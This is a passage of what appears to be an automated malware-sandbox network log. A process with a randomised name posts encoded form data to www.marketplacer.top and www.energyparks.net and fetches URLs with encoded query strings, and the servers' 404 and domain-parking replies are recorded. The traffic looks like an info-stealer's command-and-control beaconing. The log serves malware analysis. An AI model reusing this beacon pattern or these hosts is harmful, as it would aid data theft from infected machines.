                                                                                      Nov 13, 2024 09:27:16.922039986 CET646INData Raw: 5a f4 0d 61 59 9b 01 82 26 9b 53 8e 7c d3 5c 56 97 85 17 4c 55 e1 bb c3 f5 b9 0e 17 44 d9 0b 70 75 76 09 a3 60 b4 5c 1c a9 66 fc 41 ae 2e 42 81 ab ae 7c cd 15 5a f4 f5 cd 97 ac f3 5b 55 fb ec 07 36 7f af 6e 7e f8 41 bc 75 16 b6 60 6c e4 42 0d 2b
                                                                                      Data Ascii: ZaY&S|\VLUDpuv`\fA.B|Z[U6n~Au`lB+K'IplZ,}/i# 7Zeq#wElBPj!WhW%' 7HBQhEd}l-G'f,3@4P_JOR1f-S_]7G!ih,


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.458854194.58.112.174802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:18.449749947 CET10900OUTPOST /xprp/ HTTP/1.1
                                                                                      Host: www.marketplacer.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.marketplacer.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.marketplacer.top/xprp/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 59 76 34 72 5a 41 4e 58 7a 58 79 69 38 50 66 45 51 49 6d 49 44 54 57 31 43 41 6c 47 4f 68 73 79 61 6c 51 41 56 5a 38 6f 4b 34 66 52 67 62 59 54 61 62 6d 33 74 43 51 6d 61 65 4f 42 75 4a 74 68 4f 43 50 6d 77 4a 63 6c 78 66 47 64 71 64 73 45 66 45 49 6f 67 49 58 39 5a 6a 65 7a 44 39 78 6c 59 45 77 68 73 65 55 41 76 2b 74 30 6f 53 63 52 76 35 4c 35 41 4e 68 52 4c 2f 47 4f 4a 41 34 7a 42 4c 46 68 49 38 6c 4f 41 79 39 77 72 30 34 32 6f 49 43 78 57 59 32 32 6a 79 51 59 52 74 41 5a 63 47 43 67 79 39 47 77 71 65 5a 64 6b 56 67 74 68 76 77 41 50 4a 61 63 67 54 65 2f 2b 2f 39 34 35 6f 51 78 68 46 43 6e 7a 6e 57 4e 55 68 6a 7a 57 67 68 35 47 46 6f 36 67 2b 62 6d 68 6e 52 2b 61 6e 75 58 72 66 6d 70 77 34 65 75 35 4f 39 6a 49 50 34 35 68 46 46 33 6f 6a 33 62 5a 6a 77 4a 66 77 37 32 72 4c 73 52 68 31 6c 37 6f 4f 68 64 68 48 4d 4c 6b 6f 6d 39 7a 4d 6c 73 4a 62 6c 46 49 67 30 56 56 68 37 70 39 4c 66 4e 76 45 54 6a 34 53 75 32 6f 73 65 54 4d 55 56 66 71 34 4c 38 44 31 76 6b 57 6c 68 55 7a 73 6a 59 32 55 45 [TRUNCATED]
                                                                                      Data Ascii: rP=Yv4rZANXzXyi8PfEQImIDTW1CAlGOhsyalQAVZ8oK4fRgbYTabm3tCQmaeOBuJthOCPmwJclxfGdqdsEfEIogIX9ZjezD9xlYEwhseUAv+t0oScRv5L5ANhRL/GOJA4zBLFhI8lOAy9wr042oICxWY22jyQYRtAZcGCgy9GwqeZdkVgthvwAPJacgTe/+/945oQxhFCnznWNUhjzWgh5GFo6g+bmhnR+anuXrfmpw4eu5O9jIP45hFF3oj3bZjwJfw72rLsRh1l7oOhdhHMLkom9zMlsJblFIg0VVh7p9LfNvETj4Su2oseTMUVfq4L8D1vkWlhUzsjY2UELXW6IedKjMdKo+/5YZOyCbYRCPdVnwEUDdVaMaUDtw/EWoSYnPTqI9F57FJbIQ+D7PquWDS+C+uCf9tjzLHQkL5o3O0SVu9qMc2PJKg140145wL6PA6veqjlvq1gB68FADEQ6qBqwOHiqhdOyEyUdgdzLSYcV6lyxdXXkrXvV8Ptri6EdT193CMbZFUqvc1WnuG/J9/tcRxr4SPz6hqrPyGXdQtfVvNCQ/crLXDHxIPGTwpQc9RR1r7/iR8nA9wztnxU6CqLVxDvHlLMWgqIv3OkKn8kg4AjdYxWgDBwLpdYiJxXI033/xStqOTiXwlojplK7c0H6EsvgFxie8yAVgRD/l9wyFvIbUrfBwgLstd3y+1RHnO+tBxxGOW0lEPWPEkUfTCQWLeyZFTlwzMmPYe2yuwag8ToIM6oULSlJByQBvYmPwkkCbWgtt4YsQP/ioGhgZEXz4Kx6+Bvd4LwRe2bI0HdTeGkB9xMaHh+dyL9ejnE/1qf01SRHdmnUTbVVsM/XF3MllAN0/dMpEAD3XRW02RBFok0ED/aSppub1Ehfi0g+VIuhKovflM9ob7PK1ucmLwGjmAE6ayXWy1xNwlYST2kvYnTzBnqg+Ls0OKTeI/66ccItXUdNKoyNod/1ATBMqk4glYCMO4thAkAFxhQTHnqvuq1AB [TRUNCATED]
                                                                                      Nov 13, 2024 09:27:19.306732893 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:27:19 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED]
                                                                                      Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$|thTB%;@i)b/:gj2{A$0*@HuAlOHzkt*jBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^|gS^wmIeG4(pSBRa"|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#|N>C%w}z|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~*pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 |\JzPAY'/4;@L>M&Mn~e(ab8$&n*"tR\,}oCQMRA [TRUNCATED]
                                                                                      Nov 13, 2024 09:27:19.306802034 CET1236INData Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f
                                                                                      Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6v=r{Vt<nX1-
                                                                                      Nov 13, 2024 09:27:19.306839943 CET424INData Raw: 13 2f 11 d2 0d 6c e1 2a e4 29 2f 13 16 0e 2c 1c da 2f 7a 7e d2 c1 7d 7a f9 91 5d 8d 40 f1 8e d4 b2 42 7f aa d7 4e 89 c2 8f b7 2d 2a 82 da 6d be ef c0 51 27 0e 27 ab 62 b6 13 f5 8f 14 f6 f8 c1 da cc e0 bd 53 33 5f a7 b2 70 54 da f2 3a 0b e5 ec c8
                                                                                      Data Ascii: /l*)/,/z~}z]@BN-*mQ''bS3_pT:Hb\8;RxC0z+,:;iFdx8WAWr"i4+obMX6_yoR^/WEBMgn4o9++=X-0.=yY/>#)EF^Qg`oF~4Xu#
                                                                                      Nov 13, 2024 09:27:19.306874990 CET646INData Raw: 5a f4 0d 61 59 9b 01 82 26 9b 53 8e 7c d3 5c 56 97 85 17 4c 55 e1 bb c3 f5 b9 0e 17 44 d9 0b 70 75 76 09 a3 60 b4 5c 1c a9 66 fc 41 ae 2e 42 81 ab ae 7c cd 15 5a f4 f5 cd 97 ac f3 5b 55 fb ec 07 36 7f af 6e 7e f8 41 bc 75 16 b6 60 6c e4 42 0d 2b
                                                                                      Data Ascii: ZaY&S|\VLUDpuv`\fA.B|Z[U6n~Au`lB+K'IplZ,}/i# 7Zeq#wElBPj!WhW%' 7HBQhEd}l-G'f,3@4P_JOR1f-S_]7G!ih,


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.458870194.58.112.174802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:21.047791004 CET530OUTGET /xprp/?rP=VtQLa3osnF7akoTJd8K7MWrEHzl8DW0FSH4Ha68GLubc/osER9eyiC9/VfKiy/o0cRDnmrVyyY747d0hGVpIr6r2fBWTDvY7eHgrrdp64c4dmhIDxYLLQeM=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.marketplacer.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:27:21.875041962 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:27:21 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Data Raw: 32 34 66 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6d 61 72 6b 65 74 70 6c 61 63 65 72 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 [TRUNCATED]
                                                                                      Data Ascii: 24fc<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.marketplacer.top</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg. [TRUNCATED]
                                                                                      Nov 13, 2024 09:27:21.875113964 CET1236INData Raw: 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f
                                                                                      Data Ascii: v><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.marketplacer.top</h1><p class="b-parking__he
                                                                                      Nov 13, 2024 09:27:21.875152111 CET1236INData Raw: d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61
                                                                                      Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_typ
                                                                                      Nov 13, 2024 09:27:21.875186920 CET1236INData Raw: 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f
                                                                                      Data Ascii: ></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/h
                                                                                      Nov 13, 2024 09:27:21.875224113 CET1236INData Raw: 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0
                                                                                      Data Ascii: edium=parking&utm_campaign=s_land_server&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_sitebuilder"><strong class="b-title b-title_size_large-compact">
                                                                                      Nov 13, 2024 09:27:21.875258923 CET1236INData Raw: 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 66 73 73 6c 26 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 9f d0 be d0 bb d1 83 d1 87 d0 b8 d1 82 d1 8c 20 53 53 4c 3c
                                                                                      Data Ascii: um=parking&utm_campaign=s_land_fssl&reg_source=parking_auto"> SSL</a><p class="b-text b-parking__promo-description l-margin_top-small l-margin_bottom-normal l-margin_top-medium@desktop l-margin_bottom-none@desktop">
                                                                                      Nov 13, 2024 09:27:21.875294924 CET1236INData Raw: 20 5d 2e 68 72 65 66 20 3d 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 2b 20 27 3f 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20
                                                                                      Data Ascii: ].href = links[ i ].href + '?'; } links[ i ].href = links[ i ].href + 'rid=' + data.ref_id; } } } var script = document.createElement('script'); var
                                                                                      Nov 13, 2024 09:27:21.875435114 CET979INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 73 5b 20 69 20 5d 5b 20 74 20 5d 20 3d 20 74 65 78 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 20 73 70 61 6e 73 5b 20 69 20 5d 2e 63 6c 61 73 73 4e 61
                                                                                      Data Ascii: spans[ i ][ t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spans[ i ].style.display = 'none'; } } }</script>... Yandex.Metrika counter --><script type="


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.4589023.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:27.064198017 CET795OUTPOST /k47i/ HTTP/1.1
                                                                                      Host: www.energyparks.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.energyparks.net
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.energyparks.net/k47i/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 77 6d 5a 6b 62 6f 6a 33 32 68 4c 4e 31 6f 6a 6c 5a 52 73 65 66 65 72 50 6e 56 71 65 58 79 42 46 65 39 61 6b 75 79 6b 2b 61 47 35 2b 73 5a 34 44 39 50 6d 7a 6a 67 37 49 2f 7a 31 77 42 6b 30 49 7a 71 46 37 52 58 47 6b 78 4c 70 4a 68 74 69 56 6d 34 5a 39 56 63 70 68 77 51 64 46 76 77 74 50 39 44 5a 4e 2b 39 73 55 71 59 6b 32 75 68 46 35 62 54 76 53 35 56 64 66 70 51 70 7a 41 56 52 76 51 76 78 2b 73 42 65 6c 76 53 64 4f 78 5a 55 35 74 2f 2f 44 64 32 44 46 34 77 6a 4c 4b 58 4c 77 46 71 31 67 57 5a 30 79 4f 77 73 43 61 7a 6f 54 56 52 65 55 79 57 52 6a 47 4f 67 70 33 67 67 64 46 51 3d 3d
                                                                                      Data Ascii: rP=wmZkboj32hLN1ojlZRseferPnVqeXyBFe9akuyk+aG5+sZ4D9Pmzjg7I/z1wBk0IzqF7RXGkxLpJhtiVm4Z9VcphwQdFvwtP9DZN+9sUqYk2uhF5bTvS5VdfpQpzAVRvQvx+sBelvSdOxZU5t//Dd2DF4wjLKXLwFq1gWZ0yOwsCazoTVReUyWRjGOgp3ggdFQ==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.4589173.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:29.627119064 CET815OUTPOST /k47i/ HTTP/1.1
                                                                                      Host: www.energyparks.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.energyparks.net
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.energyparks.net/k47i/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 77 6d 5a 6b 62 6f 6a 33 32 68 4c 4e 32 4a 54 6c 65 43 30 65 65 2b 72 4d 69 56 71 65 63 53 42 42 65 39 47 6b 75 33 45 75 5a 30 64 2b 73 38 45 44 38 4c 79 7a 32 67 37 49 6e 44 31 31 50 45 30 39 7a 71 42 5a 52 54 47 6b 78 4c 74 4a 68 73 53 56 6c 50 4e 79 56 4d 70 6a 70 67 64 48 77 41 74 50 39 44 5a 4e 2b 35 45 79 71 62 55 32 70 52 56 35 5a 78 58 52 77 31 64 63 2b 67 70 7a 58 46 52 72 51 76 78 51 73 45 2b 50 76 55 5a 4f 78 59 6b 35 73 72 4c 41 57 32 44 48 38 77 69 30 62 58 4b 6a 4b 59 34 63 5a 72 64 55 4a 44 34 31 57 56 6c 4a 45 67 2f 44 67 57 31 51 62 4a 70 64 36 6a 64 55 65 66 59 66 34 76 76 52 37 63 37 77 4d 55 47 6e 39 35 33 4c 2b 53 30 3d
                                                                                      Data Ascii: rP=wmZkboj32hLN2JTleC0ee+rMiVqecSBBe9Gku3EuZ0d+s8ED8Lyz2g7InD11PE09zqBZRTGkxLtJhsSVlPNyVMpjpgdHwAtP9DZN+5EyqbU2pRV5ZxXRw1dc+gpzXFRrQvxQsE+PvUZOxYk5srLAW2DH8wi0bXKjKY4cZrdUJD41WVlJEg/DgW1QbJpd6jdUefYf4vvR7c7wMUGn953L+S0=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.4589323.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:32.175096989 CET10897OUTPOST /k47i/ HTTP/1.1
                                                                                      Host: www.energyparks.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.energyparks.net
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.energyparks.net/k47i/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 77 6d 5a 6b 62 6f 6a 33 32 68 4c 4e 32 4a 54 6c 65 43 30 65 65 2b 72 4d 69 56 71 65 63 53 42 42 65 39 47 6b 75 33 45 75 5a 30 56 2b 76 4f 38 44 39 73 4f 7a 77 51 37 49 75 6a 31 30 50 45 30 67 7a 71 35 64 52 54 4b 53 78 49 46 4a 7a 61 47 56 67 2b 4e 79 62 4d 70 6a 30 51 64 43 76 77 74 67 39 44 49 45 2b 39 6f 79 71 62 55 32 70 53 39 35 50 7a 76 52 38 56 64 66 70 51 6f 79 41 56 52 58 51 76 70 6d 73 45 37 36 76 6c 6c 4f 6f 37 63 35 71 59 6a 41 4a 47 44 42 37 77 69 73 62 58 48 37 4b 59 56 74 5a 75 49 78 4a 43 41 31 56 43 59 4d 59 42 75 64 69 45 5a 35 43 70 77 38 35 43 74 72 63 2f 77 51 72 71 4c 50 74 59 72 69 4c 69 48 4f 70 5a 54 70 6b 55 79 2b 6b 62 74 48 74 41 6d 53 6c 45 31 30 4f 50 56 48 49 41 77 38 6b 51 53 2b 5a 39 6e 73 63 31 67 45 51 52 2b 6d 77 41 4a 4d 62 31 48 75 55 6d 4a 51 6e 39 69 70 45 59 46 64 34 73 46 31 4e 30 73 31 2f 56 45 4f 61 4f 68 4e 6e 48 76 30 4f 77 72 4f 37 65 56 55 54 4f 35 55 4f 48 71 52 63 47 51 4e 48 6b 6c 75 64 58 69 71 77 47 57 54 34 30 4d 4a 6d 39 41 62 51 76 75 [TRUNCATED]
                                                                                      Data Ascii: rP=wmZkboj32hLN2JTleC0ee+rMiVqecSBBe9Gku3EuZ0V+vO8D9sOzwQ7Iuj10PE0gzq5dRTKSxIFJzaGVg+NybMpj0QdCvwtg9DIE+9oyqbU2pS95PzvR8VdfpQoyAVRXQvpmsE76vllOo7c5qYjAJGDB7wisbXH7KYVtZuIxJCA1VCYMYBudiEZ5Cpw85Ctrc/wQrqLPtYriLiHOpZTpkUy+kbtHtAmSlE10OPVHIAw8kQS+Z9nsc1gEQR+mwAJMb1HuUmJQn9ipEYFd4sF1N0s1/VEOaOhNnHv0OwrO7eVUTO5UOHqRcGQNHkludXiqwGWT40MJm9AbQvuK3R/Cnr1QyMEZl+dDEvAEcpfeQXdENZYpcMaGao3GE1De3Nt9QsvdN67tOWji4rhQbpCLBE8cppOSrJfHzgpSTKWJ0pieKpj7R1e1qQs4LWEPMWKTfa0eWCCDin4ymRSZitaPmWZ2K79lc/YsVl1boMAY4o1S1+G9u2YtjUm2AKklDEwZXbkz51EjcB4EK6v4hSOQfL7DhO2JqcZpCS3LRBHiWvqRmIEB39DIpgyXMlNA3mxjcHhFrUhKe/A7Occq5sMrsdkAhgNFtVmjnvhZWrKVQPgQv85LuwUpf/5z+SYZH0d4pJKm3xfgjx9poXB8tgjtoowT6MdrdT73hpBRaqyslSnpw++tU4GdHbn00ETvZrh49uLkEa2PStxKQ6hOyJEVkchnuvENGOYHH4ch8HoSlmgPxbJApqqnlcX8+dYF5KwPUzy1DhsmtlYtHVelJzZQRYHzQp6rIA9VotN6r8QPvz4x2hsuUPrLi4+uOMjc85gwBGReOq5muJvqXNOPeqw/ubOcdESRv0m5xVJ7Qs7RkM84JaC/AXuCzzTXftaVSbbTUIpREGNufciL+WWEyVxT1YWuvsKXiiUjovROGpolnyU3xrpVbhM2g7T6Gl5fzfiahXo5VvtUK21p+V8on0+u/U1PhNsRhcOY6CpCnmNB87e/YIcdJ [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.4589483.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:34.721456051 CET529OUTGET /k47i/?rP=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.energyparks.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
